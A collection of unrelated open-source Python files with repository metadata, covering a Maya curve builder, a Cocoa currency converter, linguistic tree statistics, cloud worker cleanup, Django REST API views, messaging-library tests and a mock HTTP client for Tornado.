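# mapping like {'get': 'list'} makes an incoming GET dispatch to the `list()`
# action.
class _FakeViewSet(object):
    def list(self):
        return 'listed'
def _bind_actions(viewset, actions):
    # eg. actions = {'get': 'list'} sets viewset.get = viewset.list
    for method, action in actions.items():
        setattr(viewset, method, getattr(viewset, action))
    return viewset
_vs = _bind_actions(_FakeViewSet(), {'get': 'list'})
assert _vs.get() == 'listed'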
|
ramcn/demo3
|
venv/lib/python3.4/site-packages/rest_framework/viewsets.py
|
Python
|
mit
| 5,303
|
import logging
logging.basicConfig()
logger = logging.getLogger(__name__)
import sys
import maya.cmds as cmds
import constants as const
def buildCurve(name):
## Bail out if a node with the name already exists
if cmds.objExists(name):
logger.warning('Curve name already exists in scene. Please pick a unique name!')
return
    if name not in const.CURVES:
        logger.warning('Curve name not found in the const.CURVES dictionary!')
return
curve = cmds.curve(name = name, d = const.CURVES[name]['d'], p = const.CURVES[name]['points'])
return curve
def buildCircle(name):
cmds.circle(name = name, c =(0, 0, 0), nr = (0, 1, 0), sw = 360, r = 1, d = 3, ut = 0, tol = 0.0001, s = 8, ch = False)
getShape = cmds.listRelatives(name, shapes = True)
cmds.rename(getShape[0], '{}Shape'.format(name))
return name
def printCurvePoints():
    """
    Prints to the console the points of the currently selected curve(s), as a
    cmds.curve() command that can be added to the curve dictionary for quickly
    building more curves for all rigging tools that use the curve dictionary.
    """
curvePoints = []
curSel = cmds.ls(sl = True)
if not curSel:
cmds.warning('Nothing selected for export.')
pass
else:
for nurbsCurve in curSel:
getDegree = cmds.getAttr(nurbsCurve + '.degree')
getSpans = cmds.getAttr(nurbsCurve + '.spans')
numPoints = int(getDegree) + int(getSpans)
for x in range (numPoints):
getWS = cmds.xform(nurbsCurve + '.cv[%s]' % x, query = True, t = True, ws = True)
tempVar = []
for p in getWS:
tempVar.append("{0:.2f}".format(p))
curvePoints.append(tempVar)
tempVar = []
numKnots = numPoints + getDegree -1
sys.stdout.write('cmds.curve(name = "' + str(curSel[0]) + '", d = ' + str(getDegree) + ', p = ' + str(curvePoints) + ')')
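# Editor's note: a small standalone sketch of the NURBS bookkeeping used in
# printCurvePoints() above -- a curve has degree + spans CVs, and the knot
# count follows as numCVs + degree - 1. Pure Python, no Maya required.
def _curve_counts(degree, spans):
    num_cvs = degree + spans
    num_knots = num_cvs + degree - 1
    return num_cvs, num_knots
# A degree-3 curve with 5 spans has 8 CVs and 10 knots.
assert _curve_counts(3, 5) == (8, 10)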
|
jamesbdunlop/defaultMayaLibrary
|
nodes/curves.py
|
Python
|
apache-2.0
| 2,112
|
import sys
import objc
from AppKit import *
class Converter (NSObject):
def convertAmount(self, amt, rate):
return amt*rate
class ConverterController (NSObject):
# First define the IB Outlets, the 'ivar' calls below define new
# instance variables in the objective-C class (e.g. visible
# for introspection in objective-C)
converter = objc.IBOutlet()
dollarField = objc.IBOutlet()
rateField = objc.IBOutlet()
totalField = objc.IBOutlet()
def awakeFromNib(self):
# Provide some defaults for the user...
self.dollarField.setFloatValue_(2.0)
self.rateField.setFloatValue_(3.0)
@objc.IBAction
def convert_(self, sender):
rate = self.rateField.floatValue()
amt = self.dollarField.floatValue()
        total = self.converter.convertAmount(amt, rate)  # match the convertAmount(amt, rate) signature
self.totalField.setFloatValue_(total)
self.rateField.selectText_(self)
#x = NSRunAlertPanel("Calculation Result",
# "The result is %s"%(total), "OK", None, None)
sys.exit(NSApplicationMain(sys.argv))
|
albertz/music-player
|
mac/pyobjc-framework-Cocoa/Examples/AppKit/CurrencyConverter/CurrencyConverter.py
|
Python
|
bsd-2-clause
| 1,082
|
"""Block util.See prints statistics about the nodes matching a given condition.
Example usage from the command line::
udapy util.See node='node.is_nonprojective()' n=3 \
stats=dir,children,c_upos,p_lemma,deprel,feats_split < in.conllu
Example output::
node.is_nonprojective()
matches 245 out of 35766 nodes (0.7%) in 174 out of 1478 trees (11.8%)
=== dir (2 values) ===
right 193 78% delta=+37%
left 52 21% delta=-33%
=== children (9 values) ===
0 64 26% delta=-38%
2 58 23% delta=+14%
3 38 15% delta= +7%
=== c_upos (15 values) ===
NOUN 118 23% delta= +4%
DET 61 12% delta= -3%
PROPN 47 9% delta= +1%
=== p_lemma (187 values) ===
il 5 2% delta= +1%
fonction 4 1% delta= +1%
écrire 4 1% delta= +1%
=== deprel (22 values) ===
appos 41 16% delta=+15%
conj 41 16% delta=+13%
punct 36 14% delta= +4%
=== feats_split (20 values) ===
Number=Sing 114 21% delta= +2%
Gender=Masc 81 15% delta= +3%
_ 76 14% delta= -6%
In addition to absolute counts for each value, the percentage within matching nodes is printed
and a delta relative to percentage within all nodes.
This helps to highlight what is special about the matching nodes.
"""
from collections import Counter
import re # may be useful in eval, thus pylint: disable=unused-import
from udapi.core.block import Block
STATS = 'dir,edge,depth,children,siblings,p_upos,p_lemma,c_upos,form,lemma,upos,deprel,feats_split'
# We need eval in this block
# pylint: disable=eval-used
class See(Block):
"""Print statistics about the nodes specified by the parameter `node`."""
def __init__(self, node, n=5, stats=STATS, **kwargs):
"""Args:
`node`: Python expression to be evaluated for each node and if True,
the node will be considered "matching".
`n`: Top n values will be printed for each statistic.
`stats`: a list of comma-separated statistics to be printed.
A statistic can be an attribute (`form`, `lemma`) or a pseudo-attribute
(`depth` = depth of a node in dependency tree,
`children` = number of children nodes,
`p_lemma` = lemma of a parent node, etc).
See `udapi.core.Node.get_attrs` for a full list of statistics.
"""
super().__init__(**kwargs)
self.node = node
self.n_limit = n
self.stats = stats.split(',')
self.match = dict()
self.every = dict()
for stat in self.stats:
self.match[stat] = Counter()
self.every[stat] = Counter()
self.overall = Counter()
def process_tree(self, root):
self.overall['trees'] += 1
tree_match = False
for node in root.descendants:
matching = self.process_node(node)
self.overall['nodes'] += 1
if matching:
self.overall['matching_nodes'] += 1
if not tree_match:
self.overall['matching_trees'] += 1
tree_match = True
def process_node(self, node):
matching = eval(self.node)
for stat in self.stats:
for value in node.get_attrs([stat], undefs=''):
self.every[stat][value] += 1
self.every[stat]['T O T A L'] += 1
if matching:
self.match[stat][value] += 1
self.match[stat]['T O T A L'] += 1
return matching
def process_end(self):
print(self.node)
print("matches %d out of %d nodes (%.1f%%) in %d out of %d trees (%.1f%%)"
% (self.overall['matching_nodes'],
self.overall['nodes'],
self.overall['matching_nodes'] * 100 / self.overall['nodes'],
self.overall['matching_trees'],
self.overall['trees'],
self.overall['matching_trees'] * 100 / self.overall['trees']))
for stat in self.stats:
vals = len(self.match[stat].keys()) - 1
print("=== %s (%d value%s) ===" % (stat, vals, 's' if vals > 1 else ''))
match_total = self.match[stat]['T O T A L'] or 1
every_total = self.every[stat]['T O T A L'] or 1
for value, match_count in self.match[stat].most_common(self.n_limit + 1):
if value == 'T O T A L':
continue
every_count = self.every[stat][value]
match_perc = 100 * match_count / match_total
every_perc = 100 * every_count / every_total
print("%15s %5d %3d%% delta=%+3d%%"
% (value, match_count, match_perc, match_perc - every_perc))
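# Editor's note: a standalone sketch of the percentage/delta arithmetic that
# process_end() performs above. The Counter contents are hypothetical; only
# the 'dir' counts for matching nodes are taken from the docstring example.
from collections import Counter
_match = Counter({'right': 193, 'left': 52, 'T O T A L': 245})
_every = Counter({'right': 14500, 'left': 21000, 'T O T A L': 35766})
for _value, _count in _match.most_common():
    if _value == 'T O T A L':
        continue
    _match_perc = 100 * _count / _match['T O T A L']
    _every_perc = 100 * _every[_value] / _every['T O T A L']
    print("%15s %5d %3d%% delta=%+3d%%"
          % (_value, _count, _match_perc, _match_perc - _every_perc))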
|
udapi/udapi-python
|
udapi/block/util/see.py
|
Python
|
gpl-3.0
| 4,850
|
import json
import logging
from logging.config import dictConfig
import threading
import pickle
import redis
import aws
from settings import Settings
def terminate_worker(worker_id, instance, client):
result = aws.terminate_machine(instance)
if result is None or len(result) == 0:
logging.error('could not remove worker %s, remove manually!' % instance)
client.delete(worker_id)
class Consuela(threading.Thread):
""" Manages the termination of machines """
def __init__(self):
with open('logging.json') as jl:
dictConfig(json.load(jl))
logging.info('Consuela: Starting.')
threading.Thread.__init__(self)
self.daemon = True
self.settings = Settings()
self.client = redis.Redis('db')
self.job_pub_sub = self.client.pubsub()
self.job_pub_sub.subscribe(['jobs'])
def run(self):
for item in self.job_pub_sub.listen():
job_id = item['data']
if job_id == 'KILL':
self.job_pub_sub.unsubscribe()
logging.info('Consuela: Stopping.')
return
#
worker_id, worker = self.get_worker(job_id)
if worker and self.client.exists(job_id):
job = pickle.loads(self.client.get(job_id))
if job.state == 'finished' and worker.instance is not None:
if not self.settings.recycle_workers:
logging.info('recycle workers off, %s finished, shutting down machine' % worker.instance)
terminate_worker(worker_id, worker.instance, self.client)
else:
if self.recycle_worker(job_id, job):
logging.info('going to recycle worker %s' % worker.instance)
worker.job_id = None
self.client.set(worker_id, pickle.dumps(worker))
else:
logging.info('no work left for %s, shutting down machine' % worker.instance)
terminate_worker(worker_id, worker.instance, self.client)
elif job.state == 'failed' and worker.instance is not None:
logging.warning('%s finished with failure' % job_id)
if self.settings.auto_remove_failed and not self.settings.recycle_workers:
logging.info('auto-remove on failure enabled, trying to remove %s' % worker.instance)
terminate_worker(worker_id, worker.instance, self.client)
else:
logging.warning('auto-remove on failure not performed, manually remove %s!' % worker.instance)
elif job.state == 'broken' and worker.instance is not None:
logging.info('Terminating worker with a broken job.')
terminate_worker(worker_id, worker.instance, self.client)
job.state = 'failed'
self.client.set(job_id, pickle.dumps(job))
elif worker_id and worker and worker.instance:
terminate_worker(worker_id, worker.instance, self.client)
else:
logging.debug('no worker found for %s' % job_id)
def get_worker(self, job_id):
for worker_id in [worker_key for worker_key in self.client.keys() if worker_key.startswith('jm-')]: # Redis keys(pattern='*') does not filter at all.
pickled_worker = self.client.get(worker_id)
if pickled_worker is None:
continue
worker = pickle.loads(pickled_worker)
if worker.job_id is not None and worker.job_id == job_id:
return worker_id, worker
return None, None
def recycle_worker(self, job_id, job):
if job.batch_id is None or not self.client.exists(job.batch_id):
logging.info('could not find a "real" batch id for %s' % job.batch_id)
return False
batch = pickle.loads(self.client.get(job.batch_id))
for batch_job_id in pickle.loads(batch.jobs):
logging.debug('have job %s in batch %s' % (batch_job_id, job.batch_id))
if batch_job_id != job_id:
logging.debug('found other job in batch, checking state')
if self.client.exists(batch_job_id):
batch_job = pickle.loads(self.client.get(batch_job_id))
logging.debug('state is %s (for %s)' % (batch_job.state, batch_job_id))
if batch_job.state == 'spawned' or batch_job.state == 'received' or batch_job.state == 'delayed':
return True
return False
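# Editor's note: a standalone sketch (with hypothetical job states) of the
# recycling rule that recycle_worker() implements above: keep the worker only
# while some *other* job in the same batch is still pending.
PENDING_STATES = ('spawned', 'received', 'delayed')
def _should_recycle(batch_job_states, finished_job_id):
    return any(job_id != finished_job_id and state in PENDING_STATES
               for job_id, state in batch_job_states.items())
assert _should_recycle({'job-1': 'finished', 'job-2': 'spawned'}, 'job-1')
assert not _should_recycle({'job-1': 'finished', 'job-2': 'failed'}, 'job-1')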
|
witlox/dcs
|
controller/ilm/consuela.py
|
Python
|
gpl-2.0
| 4,723
|
from django.conf import settings
from django.db.models import Count, F, Q
from django_filters.rest_framework.backends import DjangoFilterBackend
from geotrek.api.mobile.serializers import trekking as api_serializers_trekking
from geotrek.api.mobile.serializers import tourism as api_serializers_tourism
from geotrek.api.v2.functions import Transform, Length, StartPoint, EndPoint
from geotrek.trekking import models as trekking_models
from rest_framework_extensions.mixins import DetailSerializerMixin
from rest_framework.permissions import AllowAny
from rest_framework import response
from rest_framework import viewsets
from rest_framework import decorators
class TrekViewSet(DetailSerializerMixin, viewsets.ReadOnlyModelViewSet):
filter_backends = (DjangoFilterBackend,)
serializer_class = api_serializers_trekking.TrekListSerializer
serializer_detail_class = api_serializers_trekking.TrekDetailSerializer
filterset_fields = ('difficulty', 'themes', 'networks', 'practice')
permission_classes = [AllowAny, ]
def get_queryset(self, *args, **kwargs):
lang = self.request.LANGUAGE_CODE
queryset = trekking_models.Trek.objects.existing()\
.select_related('topo_object') \
.prefetch_related('topo_object__aggregations', 'attachments') \
.order_by('pk').annotate(length_2d_m=Length('geom'))
if not self.action == 'list':
queryset = queryset.annotate(geom2d_transformed=Transform(F('geom'), settings.API_SRID))
if self.action == 'list':
queryset = queryset.annotate(count_parents=Count('trek_parents')).\
exclude(Q(count_parents__gt=0) & Q(published=False))
if 'portal' in self.request.GET:
queryset = queryset.filter(Q(portal__name=self.request.GET['portal']) | Q(portal=None))
return queryset.annotate(start_point=Transform(StartPoint('geom'), settings.API_SRID),
end_point=Transform(EndPoint('geom'), settings.API_SRID)). \
filter(Q(**{'published_{lang}'.format(lang=lang): True})
| Q(**{'trek_parents__parent__published_{lang}'.format(lang=lang): True,
'trek_parents__parent__deleted': False})).distinct()
def get_serializer_context(self):
return {'root_pk': self.request.GET.get('root_pk')}
@decorators.action(detail=True, methods=['get'])
def pois(self, request, *args, **kwargs):
trek = self.get_object()
root_pk = self.request.GET.get('root_pk') or trek.pk
qs = trek.pois.filter(published=True).select_related('topo_object', 'type', )\
.prefetch_related('topo_object__aggregations', 'attachments') \
.annotate(geom2d_transformed=Transform(F('geom'), settings.API_SRID))
data = api_serializers_trekking.POIListSerializer(qs, many=True, context={'root_pk': root_pk}).data
return response.Response(data)
@decorators.action(detail=True, methods=['get'])
def touristic_contents(self, request, *args, **kwargs):
trek = self.get_object()
root_pk = self.request.GET.get('root_pk') or trek.pk
qs = trek.touristic_contents.filter(published=True).prefetch_related('attachments') \
.annotate(geom2d_transformed=Transform(F('geom'), settings.API_SRID))
data = api_serializers_tourism.TouristicContentListSerializer(qs, many=True, context={'root_pk': root_pk}).data
return response.Response(data)
@decorators.action(detail=True, methods=['get'])
def touristic_events(self, request, *args, **kwargs):
trek = self.get_object()
root_pk = self.request.GET.get('root_pk') or trek.pk
        qs = trek.touristic_events.filter(published=True).prefetch_related('attachments') \
.annotate(geom2d_transformed=Transform(F('geom'), settings.API_SRID))
data = api_serializers_tourism.TouristicEventListSerializer(qs, many=True, context={'root_pk': root_pk}).data
return response.Response(data)
|
makinacorpus/Geotrek
|
geotrek/api/mobile/views/trekking.py
|
Python
|
bsd-2-clause
| 4,033
|
#
# Copyright 2015 Geoff MacGill
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import with_statement
from ..base import ServerFrame
class Receipt(ServerFrame):
abstract = True
class Receipt10(Receipt):
version = '1.0'
verb = 'RECEIPT'
headers_required = ('receipt-id', )
class Receipt11(Receipt10):
version = '1.1'
class Receipt12(Receipt11):
version = '1.2'
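# Editor's note: a minimal sketch (not part of the original module) of how a
# caller might pick the Receipt frame class for a negotiated STOMP version,
# using the three concrete classes defined above.
RECEIPT_BY_VERSION = {cls.version: cls for cls in (Receipt10, Receipt11, Receipt12)}
def receipt_class_for(version):
    # e.g. receipt_class_for('1.2') returns Receipt12
    return RECEIPT_BY_VERSION[version]
assert receipt_class_for('1.1') is Receipt11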
|
skippyprime/stimpi
|
stimpi/frames/impl/receipt.py
|
Python
|
apache-2.0
| 1,058
|
from __future__ import absolute_import
from __future__ import with_statement
import warnings
from mock import patch
from kombu.connection import BrokerConnection
from kombu.exceptions import StdChannelError
from kombu.transport import virtual
from kombu.utils import uuid
from kombu.tests.compat import catch_warnings
from kombu.tests.utils import TestCase
from kombu.tests.utils import Mock, redirect_stdouts
def client(**kwargs):
return BrokerConnection(transport="kombu.transport.virtual.Transport",
**kwargs)
def memory_client():
return BrokerConnection(transport="memory")
class test_BrokerState(TestCase):
def test_constructor(self):
s = virtual.BrokerState()
self.assertTrue(hasattr(s, "exchanges"))
self.assertTrue(hasattr(s, "bindings"))
t = virtual.BrokerState(exchanges=16, bindings=32)
self.assertEqual(t.exchanges, 16)
self.assertEqual(t.bindings, 32)
class test_QoS(TestCase):
def setUp(self):
self.q = virtual.QoS(client().channel(), prefetch_count=10)
def tearDown(self):
self.q._on_collect.cancel()
def test_constructor(self):
self.assertTrue(self.q.channel)
self.assertTrue(self.q.prefetch_count)
self.assertFalse(self.q._delivered.restored)
self.assertTrue(self.q._on_collect)
@redirect_stdouts
def test_can_consume(self, stdout, stderr):
_restored = []
class RestoreChannel(virtual.Channel):
do_restore = True
def _restore(self, message):
_restored.append(message)
self.assertTrue(self.q.can_consume())
for i in range(self.q.prefetch_count - 1):
self.q.append(i, uuid())
self.assertTrue(self.q.can_consume())
self.q.append(i + 1, uuid())
self.assertFalse(self.q.can_consume())
tag1 = self.q._delivered.keys()[0]
self.q.ack(tag1)
self.assertTrue(self.q.can_consume())
tag2 = uuid()
self.q.append(i + 2, tag2)
self.assertFalse(self.q.can_consume())
self.q.reject(tag2)
self.assertTrue(self.q.can_consume())
self.q.channel = RestoreChannel(self.q.channel.connection)
tag3 = uuid()
self.q.append(i + 3, tag3)
self.q.reject(tag3, requeue=True)
self.q._flush()
self.q.restore_unacked_once()
self.assertListEqual(_restored, [11, 9, 8, 7, 6, 5, 4, 3, 2, 1])
self.assertTrue(self.q._delivered.restored)
self.assertFalse(self.q._delivered)
self.q.restore_unacked_once()
self.q._delivered.restored = False
self.q.restore_unacked_once()
self.assertTrue(stderr.getvalue())
self.assertFalse(stdout.getvalue())
def test_get(self):
self.q._delivered["foo"] = 1
self.assertEqual(self.q.get("foo"), 1)
class test_Message(TestCase):
def test_create(self):
c = client().channel()
data = c.prepare_message("the quick brown fox...")
tag = data["properties"]["delivery_tag"] = uuid()
message = c.message_to_python(data)
self.assertIsInstance(message, virtual.Message)
self.assertIs(message, c.message_to_python(message))
self.assertEqual(message.body,
"the quick brown fox...".encode("utf-8"))
self.assertTrue(message.delivery_tag, tag)
def test_create_no_body(self):
virtual.Message(Mock(), {
"body": None,
"properties": {"delivery_tag": 1}})
def test_serializable(self):
c = client().channel()
data = c.prepare_message("the quick brown fox...")
tag = data["properties"]["delivery_tag"] = uuid()
message = c.message_to_python(data)
dict_ = message.serializable()
self.assertEqual(dict_["body"],
"the quick brown fox...".encode("utf-8"))
self.assertEqual(dict_["properties"]["delivery_tag"], tag)
class test_AbstractChannel(TestCase):
def test_get(self):
with self.assertRaises(NotImplementedError):
virtual.AbstractChannel()._get("queue")
def test_put(self):
with self.assertRaises(NotImplementedError):
virtual.AbstractChannel()._put("queue", "m")
def test_size(self):
self.assertEqual(virtual.AbstractChannel()._size("queue"), 0)
def test_purge(self):
with self.assertRaises(NotImplementedError):
virtual.AbstractChannel()._purge("queue")
def test_delete(self):
with self.assertRaises(NotImplementedError):
virtual.AbstractChannel()._delete("queue")
def test_new_queue(self):
self.assertIsNone(virtual.AbstractChannel()._new_queue("queue"))
def test_has_queue(self):
self.assertTrue(virtual.AbstractChannel()._has_queue("queue"))
def test_poll(self):
class Cycle(object):
called = False
def get(self):
self.called = True
return True
cycle = Cycle()
self.assertTrue(virtual.AbstractChannel()._poll(cycle))
self.assertTrue(cycle.called)
class test_Channel(TestCase):
def setUp(self):
self.channel = client().channel()
def tearDown(self):
if self.channel._qos is not None:
self.channel._qos._on_collect.cancel()
def test_exchange_declare(self):
c = self.channel
c.exchange_declare("test_exchange_declare", "direct",
durable=True, auto_delete=True)
self.assertIn("test_exchange_declare", c.state.exchanges)
# can declare again with same values
c.exchange_declare("test_exchange_declare", "direct",
durable=True, auto_delete=True)
self.assertIn("test_exchange_declare", c.state.exchanges)
# using different values raises NotEquivalentError
with self.assertRaises(virtual.NotEquivalentError):
c.exchange_declare("test_exchange_declare", "direct",
durable=False, auto_delete=True)
def test_exchange_delete(self, ex="test_exchange_delete"):
class PurgeChannel(virtual.Channel):
purged = []
def _purge(self, queue):
self.purged.append(queue)
c = PurgeChannel(self.channel.connection)
c.exchange_declare(ex, "direct", durable=True, auto_delete=True)
self.assertIn(ex, c.state.exchanges)
self.assertNotIn(ex, c.state.bindings) # no bindings yet
c.exchange_delete(ex)
self.assertNotIn(ex, c.state.exchanges)
c.exchange_declare(ex, "direct", durable=True, auto_delete=True)
c.queue_declare(ex)
c.queue_bind(ex, ex, ex)
self.assertTrue(c.state.bindings[ex])
c.exchange_delete(ex)
self.assertNotIn(ex, c.state.bindings)
self.assertIn(ex, c.purged)
def test_queue_delete__if_empty(self, n="test_queue_delete__if_empty"):
class PurgeChannel(virtual.Channel):
purged = []
size = 30
def _purge(self, queue):
self.purged.append(queue)
def _size(self, queue):
return self.size
c = PurgeChannel(self.channel.connection)
c.exchange_declare(n)
c.queue_declare(n)
c.queue_bind(n, n, n)
c.queue_bind(n, n, n) # tests code path that returns
# if queue already bound.
c.queue_delete(n, if_empty=True)
self.assertIn(n, c.state.bindings)
c.size = 0
c.queue_delete(n, if_empty=True)
self.assertNotIn(n, c.state.bindings)
self.assertIn(n, c.purged)
def test_queue_purge(self, n="test_queue_purge"):
class PurgeChannel(virtual.Channel):
purged = []
def _purge(self, queue):
self.purged.append(queue)
c = PurgeChannel(self.channel.connection)
c.exchange_declare(n)
c.queue_declare(n)
c.queue_bind(n, n, n)
c.queue_purge(n)
self.assertIn(n, c.purged)
def test_basic_publish__get__consume__restore(self,
n="test_basic_publish"):
c = memory_client().channel()
c.exchange_declare(n)
c.queue_declare(n)
c.queue_bind(n, n, n)
c.queue_declare(n + "2")
c.queue_bind(n + "2", n, n)
m = c.prepare_message("nthex quick brown fox...")
c.basic_publish(m, n, n)
r1 = c.message_to_python(c.basic_get(n))
self.assertTrue(r1)
self.assertEqual(r1.body,
"nthex quick brown fox...".encode("utf-8"))
self.assertIsNone(c.basic_get(n))
consumer_tag = uuid()
c.basic_consume(n + "2", False, consumer_tag=consumer_tag,
callback=lambda *a: None)
self.assertIn(n + "2", c._active_queues)
r2, _ = c.drain_events()
r2 = c.message_to_python(r2)
self.assertEqual(r2.body,
"nthex quick brown fox...".encode("utf-8"))
self.assertEqual(r2.delivery_info["exchange"], n)
self.assertEqual(r2.delivery_info["routing_key"], n)
with self.assertRaises(virtual.Empty):
c.drain_events()
c.basic_cancel(consumer_tag)
c._restore(r2)
r3 = c.message_to_python(c.basic_get(n))
self.assertTrue(r3)
self.assertEqual(r3.body, "nthex quick brown fox...".encode("utf-8"))
self.assertIsNone(c.basic_get(n))
def test_basic_ack(self):
class MockQoS(virtual.QoS):
was_acked = False
def ack(self, delivery_tag):
self.was_acked = True
self.channel._qos = MockQoS(self.channel)
self.channel.basic_ack("foo")
self.assertTrue(self.channel._qos.was_acked)
def test_basic_recover__requeue(self):
class MockQoS(virtual.QoS):
was_restored = False
def restore_unacked(self):
self.was_restored = True
self.channel._qos = MockQoS(self.channel)
self.channel.basic_recover(requeue=True)
self.assertTrue(self.channel._qos.was_restored)
def test_restore_unacked_raises_BaseException(self):
q = self.channel.qos
q._flush = Mock()
q._delivered = {1: 1}
q.channel._restore = Mock()
q.channel._restore.side_effect = SystemExit
errors = q.restore_unacked()
self.assertIsInstance(errors[0][0], SystemExit)
self.assertEqual(errors[0][1], 1)
self.assertFalse(q._delivered)
@patch("kombu.transport.virtual.emergency_dump_state")
@patch("kombu.transport.virtual.say")
def test_restore_unacked_once_when_unrestored(self, say,
emergency_dump_state):
q = self.channel.qos
q._flush = Mock()
class State(dict):
restored = False
q._delivered = State({1: 1})
ru = q.restore_unacked = Mock()
exc = None
try:
raise KeyError()
except KeyError, exc_:
exc = exc_
ru.return_value = [(exc, 1)]
self.channel.do_restore = True
q.restore_unacked_once()
self.assertTrue(say.called)
self.assertTrue(emergency_dump_state.called)
def test_basic_recover(self):
with self.assertRaises(NotImplementedError):
self.channel.basic_recover(requeue=False)
def test_basic_reject(self):
class MockQoS(virtual.QoS):
was_rejected = False
def reject(self, delivery_tag, requeue=False):
self.was_rejected = True
self.channel._qos = MockQoS(self.channel)
self.channel.basic_reject("foo")
self.assertTrue(self.channel._qos.was_rejected)
def test_basic_qos(self):
self.channel.basic_qos(prefetch_count=128)
self.assertEqual(self.channel._qos.prefetch_count, 128)
def test_lookup__undeliverable(self, n="test_lookup__undeliverable"):
warnings.resetwarnings()
with catch_warnings(record=True) as log:
self.assertListEqual(self.channel._lookup(n, n, "ae.undeliver"),
["ae.undeliver"])
self.assertTrue(log)
self.assertIn("could not be delivered", log[0].message.args[0])
def test_context(self):
x = self.channel.__enter__()
self.assertIs(x, self.channel)
x.__exit__()
self.assertTrue(x.closed)
def test_cycle_property(self):
self.assertTrue(self.channel.cycle)
def test_flow(self):
with self.assertRaises(NotImplementedError):
self.channel.flow(False)
def test_close_when_no_connection(self):
self.channel.connection = None
self.channel.close()
self.assertTrue(self.channel.closed)
def test_drain_events_has_get_many(self):
c = self.channel
c._get_many = Mock()
c._poll = Mock()
c._consumers = [1]
c._qos = Mock()
c._qos.can_consume.return_value = True
c.drain_events(timeout=10.0)
c._get_many.assert_called_with(c._active_queues, timeout=10.0)
def test_get_exchanges(self):
self.channel.exchange_declare(exchange="foo")
self.assertTrue(self.channel.get_exchanges())
def test_basic_cancel_not_in_active_queues(self):
c = self.channel
c._consumers.add("x")
c._tag_to_queue["x"] = "foo"
c._active_queues = Mock()
c._active_queues.remove.side_effect = ValueError()
c.basic_cancel("x")
c._active_queues.remove.assert_called_with("foo")
def test_basic_cancel_unknown_ctag(self):
self.assertIsNone(self.channel.basic_cancel("unknown-tag"))
def test_list_bindings(self):
c = self.channel
c.exchange_declare(exchange="foo")
c.queue_declare(queue="q")
c.queue_bind(queue="q", exchange="foo", routing_key="rk")
self.assertIn(("q", "foo", "rk"), list(c.list_bindings()))
def test_after_reply_message_received(self):
c = self.channel
c.queue_delete = Mock()
c.after_reply_message_received("foo")
c.queue_delete.assert_called_with("foo")
def test_queue_delete_unknown_queue(self):
self.assertIsNone(self.channel.queue_delete("xiwjqjwel"))
def test_queue_declare_passive(self):
has_queue = self.channel._has_queue = Mock()
has_queue.return_value = False
with self.assertRaises(StdChannelError):
self.channel.queue_declare(queue="21wisdjwqe", passive=True)
class test_Transport(TestCase):
def setUp(self):
self.transport = client().transport
def test_custom_polling_interval(self):
x = client(transport_options=dict(polling_interval=32.3))
self.assertEqual(x.transport.polling_interval, 32.3)
def test_close_connection(self):
c1 = self.transport.create_channel(self.transport)
c2 = self.transport.create_channel(self.transport)
self.assertEqual(len(self.transport.channels), 2)
self.transport.close_connection(self.transport)
self.assertFalse(self.transport.channels)
del(c1) # so pyflakes doesn't complain
del(c2)
def test_drain_channel(self):
channel = self.transport.create_channel(self.transport)
with self.assertRaises(virtual.Empty):
self.transport._drain_channel(channel)
|
anistark/mozillians
|
vendor-local/lib/python/kombu/tests/transport/virtual/test_base.py
|
Python
|
bsd-3-clause
| 15,569
|
class MapperSimilarity:
    def __init__(self, maxPictures):
        self.maxPictures = maxPictures
    def map(self, theContext):
        mapIterator = theContext.iterator
        pictureIdx = mapIterator.getNext().rstrip('\n')
        while pictureIdx:
            pictureIdx = int(pictureIdx)
            for i in range(pictureIdx, self.maxPictures):
                theContext.putKeyValue(pictureIdx, i)
            pictureIdx = mapIterator.getNext().rstrip('\n')
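# Editor's note: a standalone usage sketch with hypothetical stand-ins for the
# framework's context and iterator. It shows that map() emits one
# (pictureIdx, i) pair for every i >= pictureIdx below maxPictures, i.e. the
# upper triangle of the picture-similarity matrix.
class _FakeIterator:
    def __init__(self, lines):
        self._lines = iter(lines)
    def getNext(self):
        return next(self._lines, '')
class _FakeContext:
    def __init__(self, lines):
        self.iterator = _FakeIterator(lines)
        self.pairs = []
    def putKeyValue(self, key, value):
        self.pairs.append((key, value))
_ctx = _FakeContext(['0\n', '1\n'])
MapperSimilarity(maxPictures=3).map(_ctx)
assert _ctx.pairs == [(0, 0), (0, 1), (0, 2), (1, 1), (1, 2)]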
|
neosky2142/PyMR
|
src/MapperSimilarity.py
|
Python
|
mit
| 477
|
"""Mocking utilities for testing"""
from io import BytesIO
import json
import os
import re
from unittest.mock import Mock
from urllib.parse import urlparse, parse_qs
import uuid
import pytest
from tornado.httpclient import HTTPResponse
from tornado.httputil import HTTPServerRequest
from tornado.log import app_log
from tornado.simple_httpclient import SimpleAsyncHTTPClient
from tornado import web
RegExpType = type(re.compile('.'))
class MockAsyncHTTPClient(SimpleAsyncHTTPClient):
"""A mock AsyncHTTPClient that allows registering handlers for mocked requests
Call .add_host to mock requests made to a given host.
"""
def initialize(self, *args, **kwargs):
super().initialize(*args, **kwargs)
self.hosts = {}
def add_host(self, host, paths):
"""Add a host whose requests should be mocked.
Args:
host (str): the host to mock (e.g. 'api.github.com')
paths (list(str|regex, callable)): a list of paths (or regexps for paths)
and callables to be called for those paths.
The mock handlers will receive the request as their only argument.
Mock handlers can return:
- None
- int (empty response with this status code)
- str, bytes for raw response content (status=200)
- list, dict for JSON response (status=200)
- HTTPResponse (passed unmodified)
Example::
client.add_host('api.github.com', [
('/user': lambda request: {'login': 'name'})
])
"""
self.hosts[host] = paths
def fetch_impl(self, request, response_callback):
urlinfo = urlparse(request.url)
host = urlinfo.hostname
if host not in self.hosts:
app_log.warning("Not mocking request to %s", request.url)
return super().fetch_impl(request, response_callback)
paths = self.hosts[host]
response = None
for path_spec, handler in paths:
if isinstance(path_spec, str):
if path_spec == urlinfo.path:
response = handler(request)
break
else:
if path_spec.match(urlinfo.path):
response = handler(request)
break
if response is None:
response = HTTPResponse(request=request, code=404, reason=request.url)
elif isinstance(response, int):
response = HTTPResponse(request=request, code=response)
elif isinstance(response, bytes):
response = HTTPResponse(request=request, code=200,
buffer=BytesIO(response),
)
elif isinstance(response, str):
response = HTTPResponse(request=request, code=200,
